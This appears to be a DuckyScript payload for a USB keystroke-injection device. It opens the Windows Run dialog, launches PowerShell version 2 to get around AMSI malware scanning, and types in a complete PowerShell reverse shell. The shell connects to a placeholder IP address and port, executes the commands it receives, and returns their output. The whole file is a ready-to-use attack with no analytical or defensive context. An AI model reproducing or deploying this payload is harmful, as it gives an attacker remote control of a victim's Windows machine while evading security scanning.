DELAY 1500
GUI r
DELAY 700
STRING powershell -v 2   # Downgrade Powershell version to bypass AMSI (Anit-Malware Scan Interface)
DELAY 200
ENTER
DELAY 1500
STRING $client = New-Object System.Net.Sockets.TCPClient('IP_Address',Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback;Write-Output $sendback;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
DELAY 500
ENTER
